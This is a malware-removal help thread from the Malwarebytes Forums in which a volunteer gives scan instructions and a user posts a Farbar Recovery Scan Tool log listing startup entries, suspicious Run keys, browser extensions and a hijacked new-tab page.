n65adserv.com


Hi Charliew49 :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.

  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on Malwarebytes Forums, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against Malwarebytes Forums's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate it if you let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread


This being said, it's time to clean up some malware, so let's get started, shall we? :)

Can you boot in Safe Mode, run a scan with Malwarebytes and provide me the log?

Malwarebytes - Clean Mode

  • Download and install the free version of Malwarebytes
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point
  • Once Malwarebytes is installed, launch it and let it update its database. You might have to click on the little arrow by Scan Status in the middle right pane for it to do so
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan
  • Let the scan run; the time required to complete the scan depends on your system and computer specs
  • Once the scan is complete, make sure that the first checkbox at the top is checked (which will automatically check every detected item), then click on the Quarantine Selected button
    • If it asks you to restart your computer to complete the removal, do so
  • Click on Export Summary after the deletion (in the bottom-left corner) and select Copy to Clipboard. Paste the content in your next reply

Alright, follow the instructions below.

Farbar Recovery Scan Tool (FRST) - Scan mode
Follow the instructions below to download and execute a scan on your system with FRST, and provide the logs in your next reply.

  • Download the right version of FRST for your system:
    • FRST 32-bit
    • FRST 64-bit
      Note: Only the right version will run on your system, the other will throw an error message. So if you don't know what your system's version is, simply download both of them, and the one that works is the one you should be using.
  • Move the executable (FRST.exe or FRST64.exe) to your Desktop
  • Right-click on the executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds
  • Make sure the Addition.txt box is checked
  • Click on the Scan button
  • On completion, two message boxes will open, saying that the results were saved to FRST.txt and Addition.txt, then two Notepad files will open
  • Copy and paste the content of both FRST.txt and Addition.txt in your next reply

Yoan,

I got this pop-up error message:

Error: _WinAPI_CreateFile

Could not open file \\.\PhysicalDrive3
Error: 0
Handle: 0

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-11-2017
Ran by Charlie (administrator) on CHARLIE-PC (10-11-2017 16:13:49)
Running from C:\Users\Charlie\Desktop
Loaded Profiles: Charlie (Available Profiles: Charlie)
Platform: Windows 10 Pro Version 1703 15063.674 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Safe Mode (with Networking)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\HelpPane.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8512760 2015-08-04] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411320 2015-08-04] (Realtek Semiconductor)
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [410616 2017-03-13] ()
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [286056 2013-07-30] (Intel Corporation)
HKLM\...\Run: [RtHDVBg_PushButton] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411320 2015-08-04] (Realtek Semiconductor)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-25] (Logitech, Inc.)
HKLM\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [239592 2017-10-31] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [AVGUI.exe] => C:\Program Files (x86)\AVG\Antivirus\AvLaunch.exe [302744 2017-10-20] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [DBAgent] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe [1540896 2015-07-15] (Seagate Technology LLC)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [239592 2017-10-31] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1284680 2014-01-17] (CANON INC.)
HKLM-x32\...\Run: [EaseUS EPM Tray Agent] => C:\Program Files (x86)\EaseUS\EaseUS Partition Master 12.5\bin\TrayPopupE\TrayTipAgentE.exe [256144 2017-09-13] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-09-05] (Oracle Corporation)
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9288408 2016-12-06] (Piriform Ltd)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [QuickenScheduledUpdates] => C:\Program Files (x86)\Quicken\bagent.exe [77216 2017-11-02] (Intuit Inc.)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [Uploader] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe [127816 2015-07-15] (Seagate Technology LLC)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [1421736 2017-03-28] (Garmin Ltd. or its subsidiaries)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AdobeCollabSync.exe [763000 2017-03-28] (Adobe Systems Incorporated)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [*Svebx<*>] => "C:\Users\Charlie\AppData\Local\Asjam\rursu.vfimyrtu" <==== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [*Qsewipofto<*>] => "C:\Users\Charlie\AppData\Local\Uxuve\l vac.lnk" <==== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Winlogon: [Shell] - <==== ATTENTION
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\PhotoScreensaver.scr [570880 2017-07-11] (Microsoft Corporation)
IFEO\AcroRd32.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\asav.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\dashboard.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\hotspot.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\lastpass.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\lpuninstall.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\turbotax.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass FF RunOnce.lnk [2016-01-21]
ShortcutTarget: Install LastPass FF RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk [2016-01-21]
ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass)
GroupPolicy: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{39b18a1c-5701-477d-9ff3-4fc1ef99d818}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{4fb4f4e8-d31d-4459-aeb2-9f787b0aea73}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-e3963092
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://mail.google.com/mail/u/0/#inbox
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell13.msn.com/?pc=DCTE
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://drudgereport.com/
hxxps://www.google.com/?gws_rd=ssl
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKLM -> DefaultScope {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms}
SearchScopes: HKLM -> {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000 -> DefaultScope {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000 -> {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000 -> {d4fee3d1-1014-4db8-a824-573bf9ab51c7} URL =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-11-10] (Microsoft Corporation)
BHO: AVG Web TuneUp -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> No File
BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2016-01-21] (LastPass)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2015-08-25] (Logitech, Inc.)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-11-10] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2017-10-22] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\ssv.dll [2017-10-25] (Oracle Corporation)
BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar.dll [2016-01-21] (LastPass)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2015-08-25] (Logitech, Inc.)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2017-11-10] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\jp2ssv.dll [2017-10-25] (Oracle Corporation)
Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2016-01-21] (LastPass)
Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar.dll [2016-01-21] (LastPass)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 9p71s5n4.default-1495840635264
FF ProfilePath: C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278 [2017-11-04]
FF Homepage: Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278 -> hxxp://www.drudgereport.com/
hxxp://www.washingtontimes.com/
hxxp://www.realclearpolitics.com/index.html
hxxp://www.newsmax.com/
hxxp://dailycaller.com/?refresh=true
hxxps://mail.google.com/mail/u/0/?shva=1#inbox
hxxps://calendar.google.com/calendar/render?tab=mc#g%7Cmonth-3+22844+22881+22857
FF Extension: (No Name) - C:\Users\Charlie\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\rapportext@trusteer.com.xpi [2017-10-25] [not signed]
FF Extension: (LastPass) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\support@lastpass.com [2016-12-17]
FF Extension: (ColorfulTabs) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\{0545b830-f0aa-4d7e-8820-50a4629a56fe} [2016-12-20]
FF Extension: (Adblock Plus) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-12-16]
FF Extension: (YouTube Flash Video Player) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\{f3bd3dd2-2888-44c5-91a2-2caeb33fb898}.xpi [2016-12-28]
FF ProfilePath: C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264 [2017-11-10]
FF NewTab: Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264 -> hxxp://search.htrackyourpackages.co?uid=7422a42f-ecf7-4ce3-957d-c2f0fd6040be&uc=20171109&ap=appfocus1&source=g-ccc1-lp0&page=newtab&implementation_id=package_0.2.0
FF Homepage: Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264 -> hxxp://www.drudgereport.com/
hxxps://www.washingtontimes.com/
hxxps://www.realclearpolitics.com/index.html
hxxps://cmx.weightwatchers.com/auth#scope=session%20openid&state=http%3A%2F%2Fcmx.weightwatchers.com%2Fnui%2Fmy-day%3Fmode%3Dfood&id_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IldKZkpkVTlBaDJiS3JzUTE4T2MrOVZFc0s2OD0ifQ.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.MfopEsFTqyIgCcxkK2NQ6dT4Ys3pc5wmRvBkiAvl6zVSu-ovlOyIs8v8Gx-hAio61gvEA8ORCxgfFkvp0E07MFY2z2KLwRusYYtFgqHjtGNK9fKNrPo2xZTJ6Do6gIFeiT8eISlO4FGLg5PUewbdp_0jFHrHtK6XWaZGQXNYv6y_jwbDv38YwzYIzjkSeTVG-683mu3d_UlIoZRVU8sKfFxcN78j7daztpzghV91BKcKSqlq0-dla9LCY8nBkw5K4J44wLMy4ibO0jHrXE9-6cle_tLIAazZS0-DUlCLlE3CqIiE88k4AepU4YwgEqJTBPKENJVWPjOmWz1rVtIeBg
FF Extension: (Package) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\@Package.xpi [2017-11-08]
FF Extension: (Safe Browsing Version 4 (temporary add-on)) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\sbv4-gradual-rollout@mozilla.com.xpi [2017-11-08]
FF Extension: (LastPass: Free Password Manager) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\support@lastpass.com [2017-10-21]
FF Extension: (Adblock Plus) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-11-08]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-01-27] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_27_0_0_183.dll [2017-10-25] ()
FF Plugin: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2016-01-21] (LastPass)
FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\mcafee\msc\npMcSnFFPl64.dll [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_183.dll [2017-10-25] ()
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll [2011-11-30] (CANON INC.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-09] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-09] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\dtplugin\npDeployJava1.dll [2017-10-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [2017-10-25] (Oracle Corporation)
FF Plugin-x32: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2016-01-21] (LastPass)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\msc\npMcSnFFPl.dll [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-10-22] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-10-22] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-03-28] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Charlie\AppData\Roaming\mozilla\plugins\npatgpc.dll [2014-08-05] (Cisco WebEx LLC)

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> mysearch.avg.com
CHR StartupUrls: Default -> "hxxps://accounts.google.com/signin/v2/sl/pwd?service=mail&passive=true&rm=false&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Fshva%3D1&scc=1&ltmpl=default&ltmplcache=2&emr=1&osid=1&flowName=GlifWebSignIn&flowEntry=AddSession&cid=0&navigationDirection=forward","hxxps://plus.google.com/discover"
CHR DefaultSearchURL: Default -> hxxps://mysearch.avg.com/search?rvt=1&sap=dsp&q={searchTerms}
CHR DefaultSearchKeyword: Default -> hxxps://mysearch.avg.com
CHR DefaultSuggestURL: Default -> hxxps://toolbar.avg.com/acp?q={searchTerms}&o=1
CHR Profile: C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default [2017-11-09]
CHR Extension: (IBM Security Rapport) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbjllphbppobebmjpjcijfbakobcheof [2017-11-08]
CHR Extension: (AVG Secure Search) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\chfdnecihphmhljaaejmgoiahnihplgn [2017-09-23]
CHR Extension: (Caret) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\fljalecfjciodhpcledpamjachpmelml [2017-10-18]
CHR Extension: (Google Docs Offline) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-03-17]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2017-10-21]
CHR Extension: (Murder Files) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\ijfecbiladpinddbjfodaaiahggomhaf [2016-07-03]
CHR Extension: (Google Forms) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\jhknlonaankphkkbnmjdlpehkinifeeg [2016-07-03]
CHR Extension: (Pixlr Touch Up) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\jklljiahjgoglchglekebfljnmbaleig [2016-07-03]
CHR Extension: (HelloSign: Online signatures made easy) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\kajjckmbclbffbpecfbiecehkfgopppd [2016-07-03]
CHR Extension: (WorkFlowy) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\koegeopamaoljbmhnfjbclbocehhgmkm [2017-10-13]
CHR Extension: (Solitaire) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkbhppfbabandkdmgjmifahoabeodiep [2017-09-23]
CHR Extension: (AVG SafePrice) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbckjcfnjmoiinpgddefodcighgikkgn [2017-10-18]
CHR Extension: (Sunrise Calendar) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\mojepfklcankkmikonjlnidiooanmpbb [2016-07-03]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-09-10]
CHR Extension: (Chrome Media Router) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-09-27]
CHR HKLM\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx
CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [chfdnecihphmhljaaejmgoiahnihplgn] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mbckjcfnjmoiinpgddefodcighgikkgn] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 AVG Antivirus; C:\Program Files (x86)\AVG\Antivirus\AVGSvc.exe [282536 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 AVG Firewall; C:\Program Files (x86)\AVG\Antivirus\afwServ.exe [331952 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgbIDSAgent; C:\Program Files (x86)\AVG\Antivirus\x64\aswidsagenta.exe [7496672 2017-10-20] (AVG Technologies CZ, s.r.o.)
S2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1428656 2017-10-31] (AVG Technologies CZ, s.r.o.)
S2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8063656 2017-10-31] (Microsoft Corporation)
S2 Dell Customer Connect; C:\Program Files (x86)\Dell Customer Connect\DCCService.exe [130936 2017-09-19] (Dell Inc.)
S2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [97616 2017-01-11] (Dell)
S2 DellDataVault; C:\Program Files\Dell\DellDataVault\DellDataVault.exe [2571352 2016-01-05] (Dell Inc.)
S2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [230248 2017-05-01] (Dell Inc.)
S2 Garmin Device Interaction Service; C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe [1099280 2017-03-28] (Garmin Ltd. or its subsidiaries)
